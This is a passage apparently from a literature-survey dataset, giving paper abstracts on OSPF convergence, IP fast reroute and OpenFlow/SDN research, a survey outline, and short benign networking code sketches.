We find that the weights chosen by the heuristic can reduce link overload during transient link failures by as much as 40% at the cost of a small performance degradation in the absence of failures (10%). --- paper_title: Relaxed multiple routing configurations: IP fast reroute for single and correlated failures paper_content: Multi-topology routing is an increasingly popular IP network management concept that allows transport of different traffic types over disjoint network paths. The concept is of particular interest for implementation of IP fast reroute (IP FRR). The authors have previously proposed an IP FRR scheme based on multi-topology routing called multiple routing configurations (MRC). MRC supports guaranteed, instantaneous recovery from any single link or node failure in biconnected networks as well as from many combined failures, provided sufficient bandwidth on the surviving links. Furthermore, in MRC different failures result in routing over different network topologies, which gives a good control of the traffic distribution in the networks after a failure. In this paper we present two contributions. First we define an enhanced IP FRR scheme which we call "relaxed MRC" (rMRC). Through experiments we demonstrate that rMRC is an improvement over MRC in all important aspects. Resource utilization in the presence of failures is significantly better, both in terms of paths lengths and in terms of load distribution between the links. The requirement to internal state in the routers is reduced as rMRC requires fewer backup topologies to provide the same degree of protection. In addition to this, the preprocessing needed to generate the backup topologies is simplified. The second contribution is an extension of rMRC that can provide fast reroute in the presence of multiple correlated failures. Our evaluations demonstrate only a small penalty in path lengths and in the number of backup topologies required. --- paper_title: Making IGP Routing Robust to Link Failures paper_content: An important requirement of a robust traffic engineering solution is insensitivity to changes, be they in the form of traffic fluctuations or changes in the network topology because of link failures. In this paper we focus on developing a fast and effective technique to compute traffic engineering solutions for Interior Gateway Protocol (IGPs) environments that are robust to link failures in the logical topology. The routing and packet forwarding decisions for IGPs is primarily governed by link weights. Our focus is on computing a single set of link weights for a traffic engineering instance that performs well over all single logical link failures. Such types of failures, although usually not long lasting, of the order of tens of minutes, can occur with high enough frequency, of the order of several a day, to significantly affect network performance. The relatively short duration of such failures coupled with issues of computational complexity and convergence time due to the size of current day networks discourage adaptive reactions to such events. Consequently, it is desirable to a priori compute a routing solution that performs well in all such scenarios. Through computational evaluations we demonstrate that our technique yields link weights that perform well over all single link failures and also scales well, in terms of computational complexity, with the size of the network. 
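Several of the fast-reroute references above (the relaxed MRC work and the robust-weights study, as well as the IP FRR survey earlier in this list) build on the basic loop-free alternate condition used in IP fast reroute (RFC 5286): a neighbor N of router S may be pre-installed as a backup toward destination D if dist(N, D) < dist(N, S) + dist(S, D), so that traffic handed to N never loops back through S. The sketch below only illustrates that inequality on an invented four-node topology; the function names are made up for the example.

```python
import heapq

def dijkstra(graph, src):
    """Shortest-path distances from src over {node: {neighbor: cost}}."""
    dist = {src: 0}
    heap = [(0, src)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist.get(u, float("inf")):
            continue
        for v, c in graph.get(u, {}).items():
            if d + c < dist.get(v, float("inf")):
                dist[v] = d + c
                heapq.heappush(heap, (d + c, v))
    return dist

def loop_free_neighbors(graph, s, d):
    """Neighbors of s satisfying dist(n, d) < dist(n, s) + dist(s, d).
    The primary next hop always qualifies; an LFA implementation would look
    for qualifying neighbors other than the primary."""
    dist = {n: dijkstra(graph, n) for n in graph}
    return [n for n in graph[s] if dist[n][d] < dist[n][s] + dist[s][d]]

# S reaches D via E (total cost 2). N's own shortest path to D runs back
# through S, so N fails the inequality and must not be used as a backup.
graph = {
    "S": {"E": 1, "N": 1},
    "E": {"S": 1, "D": 1},
    "N": {"S": 1, "D": 10},
    "D": {"E": 1, "N": 10},
}
print(loop_free_neighbors(graph, "S", "D"))   # ['E']
```

Coverage of this simple per-destination test depends entirely on the topology, which is one motivation for the multi-topology and MRC-style schemes collected above.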
--- paper_title: Evaluation of IP Fast Reroute Proposals paper_content: With the increasing demand for low-latency applications in the Internet, the slow convergence of the existing routing protocols is a growing concern. A number of IP fast reroute mechanisms have been developed by the IETF to address the issue. The goal of the IPFRR mechanisms is to activate alternate routing paths which avoid micro loops under node or link failures. In this paper we present a comprehensive analysis of these proposals by evaluating their coverage for a variety of inferred and synthetic ISP topologies. --- paper_title: Multi-Topology (MT) Routing in OSPF paper_content: This draft describes an extension to OSPF in order to define independent IP topologies called Multi-Topologies (MTs). The MT extension can be used for computing different paths for unicast traffic, multicast traffic, different classes of service based on flexible criteria, or an in-band network management topology. [M-ISIS] describes a similar mechanism for ISIS. An optional extension to exclude selected links from the default topology is also described. --- paper_title: A Survey for Open Shortest Path First Weight Setting (OSPFWS) Problem paper_content: Open shortest path first (OSPF) is the most commonly used intra-domain routing protocol. It is used to select the paths along which traffic is routed within autonomous systems (AS). OSPF calculates routes as follows. Each link is assigned a weight by the operator. Each node in the autonomous system computes shortest paths and creates destination tables used to route data to the next node on the path to its destination. Shortest paths are selected according to path cost, and path cost is the sum of the weights of the links on the path. The link weights therefore determine the shortest paths, which in turn determine the routing of network traffic flow. The OSPF weight setting problem is to find a set of OSPF weights that optimizes network performance; it is an NP-hard problem. In the last couple of years, various algorithms for the OSPF weight setting problem have been proposed. In this paper, we present a survey of OSPF weight setting algorithms and compare their performances. --- paper_title: A Framework for Loop-free Convergence paper_content: This draft describes mechanisms that may be used to prevent or to suppress the formation of micro-loops when an IP or MPLS network undergoes topology change due to failure, repair or management action. --- paper_title: Internet traffic engineering by optimizing OSPF weights paper_content: Open shortest path first (OSPF) is the most commonly used intra-domain Internet routing protocol. Traffic flow is routed along shortest paths, splitting flow at nodes where several outgoing links are on shortest paths to the destination. The weights of the links, and thereby the shortest path routes, can be changed by the network operator. The weights could be set proportional to their physical distances, but often the main goal is to avoid congestion, i.e., overloading of links, and the standard heuristic recommended by Cisco is to make the weight of a link inversely proportional to its capacity. Our starting point was a proposed AT&T WorldNet backbone with demands projected from previous measurements. The desire was to optimize the weight setting based on the projected demands. We showed that optimizing the weight settings for a given set of demands is NP-hard, so we resorted to a local search heuristic.
Surprisingly, it turned out that for the proposed AT&T WorldNet backbone we found weight settings that performed within a few percent of the optimal general routing, where the flow for each demand is optimally distributed over all paths between source and destination. This contrasts with the common belief that OSPF routing leads to congestion, and it shows that for the network and demand matrix studied we cannot get substantially better load balancing by switching to the proposed, more flexible multi-protocol label switching (MPLS) technologies. Our techniques were also tested on synthetic internetworks, based on a model of Zegura et al. (1996), for which we did not always get quite as close to the optimal general routing. ---
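Before the survey outline below, a short illustration of the load model used in the Fortz and Thorup abstract above: traffic is spread by splitting evenly at every node that has several next hops on a shortest path to the destination. This is our sketch, assuming networkx and symmetric link weights; it is not code from the paper, and all names are illustrative.

import networkx as nx

def ecmp_loads(G, src, dst, volume):
    # Distances from every node to dst (weights are symmetric, so distances
    # from dst equal distances to dst).
    dist = nx.single_source_dijkstra_path_length(G, dst, weight="weight")
    flow_at = {u: 0.0 for u in dist}
    flow_at[src] = volume
    loads = {}
    # Visit nodes farthest from dst first, so all inflow has arrived before
    # a node splits it among its shortest-path next hops.
    for u in sorted(dist, key=dist.get, reverse=True):
        if u == dst or flow_at[u] == 0.0:
            continue
        hops = [v for v in G[u]
                if v in dist and abs(dist[u] - (G[u][v]["weight"] + dist[v])) < 1e-9]
        share = flow_at[u] / len(hops)
        for v in hops:
            loads[(u, v)] = loads.get((u, v), 0.0) + share
            flow_at[v] += share
    return loads

# Two equal-cost two-hop paths from s to t: each carries half of the demand.
G = nx.Graph()
for u, v, w in [("s", "a", 1), ("s", "b", 1), ("a", "t", 1), ("b", "t", 1)]:
    G.add_edge(u, v, weight=w)
print(ecmp_loads(G, "s", "t", 8.0))   # every link carries 4.0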
Title: Improving Convergence Speed and Scalability in OSPF: A Survey
Section 1: INTRODUCTION
Description 1: This section provides an overview of the OSPF protocol, its history, challenges, and the motivation for improving its convergence speed and scalability.
Section 2: CONVERGENCE TO A TOPOLOGY CHANGE IN OSPF: AN OVERVIEW
Description 2: This section outlines the general process of OSPF convergence following a topology change, divided into multiple steps.
Section 3: FASTER FAILURE DETECTION IN OSPF
Description 3: This section describes the default failure detection mechanisms in OSPF, and recent proposals for speeding up failure detection.
Section 4: FASTER AND FEWER ADJACENCY ESTABLISHMENTS
Description 4: This section covers proposed enhancements to the process of establishing adjacency between routers and reducing the number of required adjacencies, especially in broadcast/NBMA LANs and MANETs.
Section 5: LSA GENERATION AND FLOODING
Description 5: This section discusses the mechanisms and optimizations related to the generation and flooding of link state advertisements (LSAs) in OSPF.
Section 6: ROUTING TABLE CALCULATION
Description 6: This section elaborates on the processes involved in routing table calculations in OSPF, including mechanisms to avoid frequent recalculations and dynamic shortest path tree algorithms.
Section 7: GRACEFUL RESTART
Description 7: This section explains the concept of graceful restart in OSPF, allowing planned control plane reboots without affecting network-wide routing.
Section 8: PROACTIVE APPROACHES TO FAILURE RECOVERY
Description 8: This section details proactive mechanisms for failure recovery, specifically MPLS fast reroute and IP fast reroute.
Section 9: CONCLUSION
Description 9: This section summarizes the survey, discusses the challenges and recent improvements in OSPF, and suggests directions for future research.
Network Innovation using OpenFlow: A Survey
10
--- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: A survey of active network research paper_content: Active networks are a novel approach to network architecture in which the switches (or routers) of the network perform customized computations on the messages flowing through them. This approach is motivated by both lead user applications, which perform user-driven computation at nodes within the network today, and the emergence of mobile code technologies that make dynamic network service innovation attainable. The authors discuss two approaches to the realization of active networks and provide a snapshot of the current research issues and activities. They illustrate how the routers of an IP network could be augmented to perform such customized processing on the datagrams flowing through them. These active routers could also interoperate with legacy routers, which transparently forward datagrams in the traditional manner. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: NetServ: Active Networking 2.0 paper_content: We present NetServ, a node architecture for deploying in-network services in the next generation Internet. 
NetServ-enabled network nodes provide a common execution environment, where network services implemented as modules can be dynamically installed and removed. We demonstrate three such modules. MicroCDN is a dynamic content distribution network (CDN) service which implements a content caching strategy specific to a content provider. The NAT Keep-alive module offloads the processing of keep-alive messages from SIP servers. The Media Relay module allows any NetServ node to act as a media relay, eliminating the need to manage standalone relay servers. NetServ aims to revive the Active Networking vision. It was too far ahead of its time a decade ago, but we believe its time has finally arrived. --- paper_title: Towards an active network architecture paper_content: Active networks allow their users to inject customized programs into the nodes of the network. An extreme case, in which we are most interested, replaces packets with "capsules" - program fragments that are executed at each network router/switch they traverse. Active architectures permit a massive increase in the sophistication of the computation that is performed within the network. They enable new applications, especially those based on application-specific multicast, information fusion, and other services that leverage network-based computation and storage. Furthermore, they will accelerate the pace of innovation by decoupling network services from the underlying hardware and allowing new services to be loaded into the infrastructure on demand. In this paper, we describe our vision of an active network architecture, outline our approach to its design, and survey the technologies that can be brought to bear on its implementation. We propose that the research community mount a joint effort to develop and deploy a wide area ActiveNet. --- paper_title: Active networking: one view of the past, present, and future paper_content: All distributed computing systems face the architectural question of the location (and nature) of programmability in the telecommunications networks, computers, and other peripheral devices comprising them. The perspective of this paper is that network elements should be as programmable as possible, to enable the most flexible distributed computing systems. There has been a persistent confluence among operating systems, programming languages, networking and distributed systems. We demonstrate how these interactions led to what is called "active networking," and in the spirit of "vox audita perit, littera scripta manet" (the spoken word perishes, but the written word remains), include an account of how it was made to happen. Lessons are drawn both from the broader research agenda, and the specific goals pursued in the SwitchWare project. We speculate on likely futures for active networking. --- paper_title: The SOFTNET project: a retrospect paper_content: An experimental multihop packet radio network, SOFTNET, is described. The concept of soft protocols for experimental packet-switched networks is introduced. Using this scheme, network nodes can be easily reprogrammed to provide new user services without interrupting normal operation. The SOFTNET network programming language is described. The hardware and software implementation of the network is outlined. --- paper_title: The ’Platform as a Service’ Model for Networking paper_content: Decoupling infrastructure management from service management can lead to innovation, new business models, and a reduction in the complexity of running services.
It is happening in the world of computing, and is poised to happen in networking. While many have considered this in the context of network virtualization, they all focus on one model - overlaying a virtual network of multiple virtual routers on top of a shared physical infrastructure, each completely isolated from the others through the use of virtualization. In this paper we argue for a different approach, where those running the service are presented with the abstraction of a single router in order to enable them to focus solely on their service rather than worrying about managing a virtual network as well. We discuss the abstraction of a single router, and the challenges of mapping the collection of abstract routers (from different parties) to the distributed and shared physical infrastructure. --- paper_title: The IEEE P1520 standards initiative for programmable network interfaces paper_content: This article discusses the need for standard software interfaces for programming of networks, specifically for service and signaling control, through programming interfaces. The objective is to enable the development of open signaling, control, and management applications as well as higher-level multimedia services on networks. The scope of this effort includes ATM switches, circuit switches, IP routers, and hybrid switches such as those that provide for fast switching of IP packets over an ATM backbone. The basic ideas represented herein are in the process of development as a standard for application programming interfaces for networks under IEEE Standards Project IEEE P1520. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: Carving research slices out of your production networks with OpenFlow paper_content: 1. SLICED PROGRAMMABLE NETWORKS OpenFlow [4] has been demonstrated as a way for researchers to run networking experiments in their production network. Last year, we demonstrated how an OpenFlow controller running on NOX [3] could move VMs seamlessly around an OpenFlow network [1]. While OpenFlow has potential [2] to open control of the network, only one researcher can innovate on the network at a time. What is required is a way to divide, or slice, network resources so that researchers and network administrators can use them in parallel. 
Network slicing implies that actions in one slice do not negatively affect other slices, even if they share the same underlying physical hardware. A common network slicing technique is VLANs. With VLANs, the administrator partitions the network by switch port and all traffic is mapped to a VLAN by input port or explicit tag. This coarse-grained type of network slicing complicates more interesting experiments such as IP mobility or wireless handover. Here, we demonstrate FlowVisor, a special purpose OpenFlow controller that allows multiple researchers to run experiments safely and independently on the same production OpenFlow network. To motivate FlowVisor’s flexibility, we demonstrate four network slices running in parallel: one slice for the production network and three slices running experimental code (Figure 1). Our demonstration runs on real network hardware deployed on our production network at Stanford and a wide-area test-bed with a mix of wired and wireless technologies. --- paper_title: Where is the debugger for my software-defined network? paper_content: The behavior of a Software-Defined Network is controlled by programs, which like all software, will have bugs - but this programmatic control also enables new ways to debug networks. This paper introduces ndb, a prototype network debugger inspired by gdb, which implements two primitives useful for debugging an SDN: breakpoints and packet backtraces. We show how ndb modifies forwarding state and logs packet digests to rebuild the sequence of events leading to an errant packet, providing SDN programmers and operators with a valuable tool for tracking down the root cause of a bug. --- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. 
OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: Maestro: A System for Scalable OpenFlow Control paper_content: The fundamental feature of an OpenFlow network is that the controller is responsible for the initial establishment of every flow by contacting related switches. Thus the performance of the controller could be a bottleneck. This paper shows how this fundamental problem is addressed by parallelism. The state of the art OpenFlow controller, called NOX, achieves a simple programming model for control function development by having a single-threaded event-loop. Yet NOX has not considered exploiting parallelism. We propose Maestro which keeps the simple programming model for programmers, and exploits parallelism in every corner together with additional throughput optimization techniques. We experimentally show that the throughput of Maestro can achieve near linear scalability on an eight core server machine. Keywords-OpenFlow, network management, multithreading, performance optimization --- paper_title: Extending Networking into the Virtualization Layer paper_content: The move to virtualization has created a new network access layer residing on hosts that connects the various VMs. Virtualized deployment environments impose requirements on networking for which traditional models are not well suited. They also provide advantages to the networking layer (such as software flexibility and welldefined end host events) that are not present in physical networks. To date, this new virtualization network layer has been largely built around standard Ethernet switching, but this technology neither satisfies these new requirements nor leverages the available advantages. We present Open vSwitch, a network switch specifically built for virtual environments. Open vSwitch differs from traditional approaches in that it exports an external interface for fine-grained control of configuration state and forwarding behavior. We describe how Open vSwitch can be used to tackle problems such as isolation in joint-tenant environments, mobility across subnets, and distributing configuration and visibility across hosts. --- paper_title: A network in a laptop: rapid prototyping for software-defined networks paper_content: Mininet is a system for rapidly prototyping large networks on the constrained resources of a single laptop. The lightweight approach of using OS-level virtualization features, including processes and network namespaces, allows it to scale to hundreds of nodes. 
Experiences with our initial implementation suggest that the ability to run, poke, and debug in real time represents a qualitative change in workflow. We share supporting case studies culled from over 100 users, at 18 institutions, who have developed Software-Defined Networks (SDN). Ultimately, we think the greatest value of Mininet will be supporting collaborative network research, by enabling self-contained SDN prototypes which anyone with a PC can download, run, evaluate, explore, tweak, and build upon. --- paper_title: NOX: towards an operating system for networks paper_content: As anyone who has operated a large network can attest, enterprise networks are difficult to manage. That they have remained so despite significant commercial and academic efforts suggests the need for a different network management paradigm. Here we turn to operating systems as an instructive example in taming management complexity. In the early days of computing, programs were written in machine languages that had no common abstractions for the underlying physical resources. This made programs hard to write, port, reason about, and debug. Modern operating systems facilitate program development by providing controlled access to high-level abstractions for resources (e.g., memory, storage, communication) and information (e.g., files, directories). These abstractions enable programs to carry out complicated tasks safely and efficiently on a wide variety of computing hardware. In contrast, networks are managed through low-level configuration of individual components. Moreover, these configurations often depend on the underlying network; for example, blocking a user’s access with an ACL entry requires knowing the user’s current IP address. More complicated tasks require more extensive network knowledge; forcing guest users’ port 80 traffic to traverse an HTTP proxy requires knowing the current network topology and the location of each guest. In this way, an enterprise network resembles a computer without an operating system, with network-dependent component configuration playing the role of hardware-dependent machine-language programming. What we clearly need is an “operating system” for networks, one that provides a uniform and centralized programmatic interface to the entire network. Analogous to the read and write access to various resources provided by computer operating systems, a network operating system provides the ability to observe and control a network. A network operating system does not manage the network itself; it merely provides a programmatic interface. Applications implemented on top of the network operating system perform the actual management tasks. The programmatic interface should be general enough to support a broad spectrum of network management applications. Such a network operating system represents two major conceptual departures from the status quo. First, the network operating system presents programs with a centralized programming model; programs are written as if the entire network were present on a single machine (i.e., one would use Dijkstra to compute shortest paths, not Bellman-Ford). This requires (as in [3, 8, 14] and elsewhere) centralizing network state. Second, programs are written in terms of high-level abstractions (e.g., user and host names), not low-level configuration parameters (e.g., IP and MAC addresses). 
This allows management directives to be enforced independent of the underlying network topology, but it requires that the network operating system carefully maintain the bindings (i.e., mappings) between these abstractions and the low-level configurations. Thus, a network operating system allows management applications to be written as centralized programs over high-level names as opposed to the distributed algorithms over low-level addresses we are forced to use today. While clearly a desirable goal, achieving this transformation from distributed algorithms to centralized programming presents significant technical challenges, and the question we pose here is: Can one build a network operating system at significant scale? --- paper_title: Ethane: taking control of the enterprise paper_content: This paper presents Ethane, a new network architecture for the enterprise. Ethane allows managers to define a single network-wide fine-grain policy, and then enforces it directly. Ethane couples extremely simple flow-based Ethernet switches with a centralized controller that manages the admittance and routing of flows. While radical, this design is backwards-compatible with existing hosts and switches. We have implemented Ethane in both hardware and software, supporting both wired and wireless hosts. Our operational Ethane network has supported over 300 hosts for the past four months in a large university network, and this deployment experience has significantly affected Ethane's design. --- paper_title: OpenFlow and PCE architectures in Wavelength Switched Optical Networks paper_content: The GMPLS protocol suite, originally designed to fully operate in a distributed fashion, is currently the reference control plane for WSONs. Recently, the requirement of effective traffic engineering solutions has led to the standardization of the PCE architecture, thus joining the distributed GMPLS control plane with a centralized network element devoted to path computation. However, the common need of network carriers to keep the network under a centralized control in strict relationship with the NMS has prevented the wide deployment of GMPLS in currently working optical networks. --- paper_title: A Path Computation Element (PCE)-Based Architecture paper_content: Constraint-based path computation is a fundamental building block for traffic engineering systems such as Multiprotocol Label Switching (MPLS) and Generalized Multiprotocol Label Switching (GMPLS) networks. Path computation in large, multi-domain, multi-region, or multi-layer networks is complex and may require special computational components and cooperation between the different network domains. This document specifies the architecture for a Path Computation Element (PCE)-based model to address this problem space. This document does not attempt to provide a detailed description of all the architectural components, but rather it describes a set of building blocks for the PCE architecture from which solutions may be constructed. This memo provides information for the Internet community. --- paper_title: Source address validation solution with OpenFlow/NOX architecture paper_content: The current Internet lacks validation of source IP addresses, resulting in many security threats. The future Internet may face a similar routing-locator spoofing problem without careful design. The source address validation standard currently in progress, SAVI, does not provide enough protection due to its constrained solution space.
In this article, a mechanism named VAVE is proposed to improve the SAVI solutions. VAVE employs the OpenFlow protocol, which provides the de facto standard network innovation interface, to solve the source address validation problem with a global view. Our evaluation results show significant improvements. --- paper_title: Lightweight DDoS flooding attack detection using NOX/OpenFlow paper_content: Distributed denial-of-service (DDoS) attacks have become one of the main Internet security problems over the last decade, threatening public web servers in particular. Although the DDoS mechanism is widely understood, its detection is a very hard task because of the similarities between normal traffic and useless packets, sent by compromised hosts to their victims. This work presents a lightweight method for DDoS attack detection based on traffic flow features, in which the extraction of such information is made with a very low overhead compared to traditional approaches. This is possible due to the use of the NOX platform, which provides a programmatic interface to facilitate the handling of switch information. Other major contributions include the high rate of detection and very low rate of false alarms obtained by flow analysis using Self Organizing Maps. --- paper_title: Software defined networking: Meeting carrier grade requirements paper_content: Software Defined Networking is a networking paradigm which allows network operators to manage networking elements using software running on an external server. This is accomplished by a split in the architecture between the forwarding element and the control element. Two technologies which allow this split for packet networks are ForCES and OpenFlow. We present energy efficiency and resilience aspects of carrier grade networks which can be met by OpenFlow. We implement flow restoration and run extensive experiments in an emulated carrier grade network. We show that OpenFlow can restore traffic quite fast, but its dependency on a centralized controller means that it will be hard to achieve 50 ms restoration in large networks serving many flows. In order to achieve 50 ms recovery, protection will be required in carrier grade networks. --- paper_title: Flexible Access Management System for Campus VLAN Based on OpenFlow paper_content: Using a lot of VLANs on campus networks has become popular for deploying many logical networks over minimal fibers/cables. A campus-wide Wi-Fi system, for example, requires a lot of VLANs for separating the access networks from other campus networks and for realizing sophisticated access control such as guest/home-user separation and security filtering. The requirement is especially high when a network roaming system, such as eduroam, is introduced. The conventional VLAN based on IEEE 802.1Q has some limitations, and the system configuration work is laborious. In this paper, we propose a flexible campus VLAN system based on OpenFlow to solve these problems. In addition, we introduce a prototype system and show evaluation results. As a result, we confirm that the proposed system can realize flexible network configurations and sophisticated access control with much simpler network management.
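Illustration (ours): the guest/staff separation described in the campus VLAN abstract above boils down to priority-ordered match/action rules of the kind an OpenFlow controller installs per port. The sketch below models a flow table in plain Python rather than using any real controller API; all field names, port numbers and addresses are made up.

from dataclasses import dataclass

@dataclass
class Rule:
    priority: int
    match: dict      # e.g. {"in_port": 7, "ipv4_dst": "10.0.0.1"}
    actions: list    # e.g. ["output:portal"]; an empty list means drop

def matches(rule, pkt):
    # Exact match on every field in the rule; "ipv4_dst_prefix" does a prefix test.
    for field, value in rule.match.items():
        if field == "ipv4_dst_prefix":
            if not pkt.get("ipv4_dst", "").startswith(value):
                return False
        elif pkt.get(field) != value:
            return False
    return True

def lookup(table, pkt):
    # Highest-priority matching entry wins, as in an OpenFlow flow table.
    for rule in sorted(table, key=lambda r: r.priority, reverse=True):
        if matches(rule, pkt):
            return rule.actions
    return ["send_to_controller"]   # table-miss: ask the controller

# Port 7 is a guest port: it may reach the captive portal and the Internet,
# but not the campus intranet. Port 3 is a staff port with normal forwarding.
table = [
    Rule(200, {"in_port": 7, "ipv4_dst": "10.0.0.1"}, ["output:portal"]),
    Rule(100, {"in_port": 7, "ipv4_dst_prefix": "10."}, []),
    Rule(50,  {"in_port": 7}, ["output:uplink"]),
    Rule(50,  {"in_port": 3}, ["output:normal"]),
]
print(lookup(table, {"in_port": 7, "ipv4_dst": "10.2.3.4"}))       # [] -> dropped
print(lookup(table, {"in_port": 7, "ipv4_dst": "93.184.216.34"}))  # ['output:uplink']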
--- paper_title: Walk the line: consistent network updates with bandwidth guarantees paper_content: New advances in technologies for high-speed and seamless migration of VMs turns VM migration into a promising and efficient means for load balancing, configuration, power saving, attaining a better resource utilization by reallocating VMs, cost management, etc. in data centers. Despite these numerous benefits, VM migration is still a challenging task for providers, since moving VMs requires update of network state, which consequently could lead to inconsistencies, outages, creation of loops and violations of service level (SLA) agreement requirements. Many applications today like financial services, social networking, recommendation systems, and web search cannot tolerate such problems or degradation of service [5, 12]. On the positive side, the emerging trend of Software Defined Networking (SDN) provides a powerful tool for tackling these challenging problems. In SDN, management applications are run by a logically-centralized controller that directly controls the packet handling functionality of the underlying switches. For example, OpenFlow, a recently proposed mechanism for SDN, provides an API that allows the controller to install rules in switches, process data packets, learn the topology changes, and query traffic counters [13]. The ability to run algorithms in a logically centralized location, and precisely manipulate the forwarding layer of switches creates a new opportunity for transitioning the network between two states. In particular this paper studies the question: given a start- --- paper_title: Consistent updates for software-defined networks: change you can believe in! paper_content: Configuration changes are a common source of instability in networks, leading to broken connectivity, forwarding loops, and access control violations. Even when the initial and final states of the network are correct, the update process often steps through intermediate states with incorrect behaviors. These problems have been recognized in the context of specific protocols, leading to a number of point solutions. However, a piecemeal attack on this fundamental problem, while pragmatic in the short term, is unlikely to lead to significant long-term progress. Software-Defined Networking (SDN) provides an exciting opportunity to do better. Because SDN is a clean-slate platform, we can build general, reusable abstractions for network updates that come with strong semantic guarantees. We believe SDN desperately needs such abstractions to make programs simpler to design, more reliable, and easier to validate using automated tools. Moreover, we believe these abstractions should be provided by a runtime system, shielding the programmer from these concerns. We propose two simple, canonical, and effective update abstractions, and present implementation mechanisms. We also show how to integrate them with a network programming language, and discuss potential applications to program verification. --- paper_title: Incremental consistent updates paper_content: A consistent update installs a new packet-forwarding policy across the switches of a software-defined network in place of an old policy. While doing so, such an update guarantees that every packet entering the network either obeys the old policy or the new one, but not some combination of the two. In this paper, we introduce new algorithms that trade the time required to perform a consistent update against the rule-space overhead required to implement it. 
We break an update into k rounds that each transfer part of the traffic to the new configuration. The more rounds used, the slower the update, but the smaller the rule-space overhead. To ensure consistency, our algorithm analyzes the dependencies between rules in the old and new policies to determine which rules to add and remove on each round. In addition, we show how to optimize the rule space used by representing the minimization problem as a mixed integer linear program. Moreover, to ensure the largest flows are moved first, while using rule space efficiently, we extend the mixed integer linear program with additional constraints. Our initial experiments show that a 6-round, optimized incremental update decreases rule space overhead from 100% to less than 10%. Moreover, if we cap the maximum rule-space overhead at 5% and assume the traffic flow volume follows Zipf's law, we find that 80% of the traffic may be transferred to the new policy in the first round and 99% in the first 3 rounds. --- paper_title: Abstractions for network update paper_content: Configuration changes are a common source of instability in networks, leading to outages, performance disruptions, and security vulnerabilities. Even when the initial and final configurations are correct, the update process itself often steps through intermediate configurations that exhibit incorrect behaviors. This paper introduces the notion of consistent network updates: updates that are guaranteed to preserve well-defined behaviors when transitioning between configurations. We identify two distinct consistency levels, per-packet and per-flow, and we present general mechanisms for implementing them in Software-Defined Networks using switch APIs like OpenFlow. We develop a formal model of OpenFlow networks, and prove that consistent updates preserve a large class of properties. We describe our prototype implementation, including several optimizations that reduce the overhead required to perform consistent updates. We present a verification tool that leverages consistent updates to significantly reduce the complexity of checking the correctness of network control software. Finally, we describe the results of some simple experiments demonstrating the effectiveness of these optimizations on example applications. --- paper_title: Ethane: taking control of the enterprise paper_content: This paper presents Ethane, a new network architecture for the enterprise. Ethane allows managers to define a single network-wide fine-grain policy, and then enforces it directly. Ethane couples extremely simple flow-based Ethernet switches with 